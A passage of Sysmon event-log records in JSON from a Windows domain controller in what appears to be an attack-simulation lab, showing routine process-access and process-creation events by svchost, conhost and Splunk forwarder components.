{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.604\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.604","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","TargetProcessId":"3792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:54.745\r\nSourceProcessGUID: {A837DB8D-0462-5F25-0000-001011660C00}\r\nSourceProcessId: 3792\r\nSourceThreadId: 3896\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:54.745","SourceProcessGUID":"{A837DB8D-0462-5F25-0000-001011660C00}","SourceProcessId":"3792","SourceThreadId":"3896","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nProcessGuid: {A837DB8D-0463-5F25-0000-001066680C00}\r\nProcessId: 616\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","ProcessGuid":"{A837DB8D-0463-5F25-0000-001066680C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM